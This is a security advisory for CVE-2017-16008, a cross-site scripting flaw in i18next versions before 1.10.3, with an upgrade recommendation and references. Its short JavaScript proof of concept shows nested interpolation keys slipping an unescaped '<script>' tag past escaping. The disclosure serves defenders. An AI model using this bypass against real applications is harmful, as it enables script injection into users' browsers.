CVE-2017-16008

Description

Affected versions of `i18next` allow untrusted user input to be injected into dictionary key names, resulting in a cross-site scripting vulnerability. ## Proof of Concept ```js var init = i18n.init({debug: true}, function(){ var test = i18n.t('__firstName__ __lastName__', { escapeInterpolation: true, firstName: '__lastNameHTML__', lastName: '<script>', }); console.log(test); }); // equals "<script> &lt;script&gt;" ``` ## Recommendation Update to version 1.10.3 or later.

Affected packages (1)

• npm/i18nextfrom 0, < 1.10.3

CVSS scores

References (4)

• ADVISORYhttps://github.com/advisories/GHSA-f89g-whpf-6q9m
• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2017-16008
• WEBhttps://github.com/i18next/i18next/pull/443
• WEBhttps://www.npmjs.com/advisories/325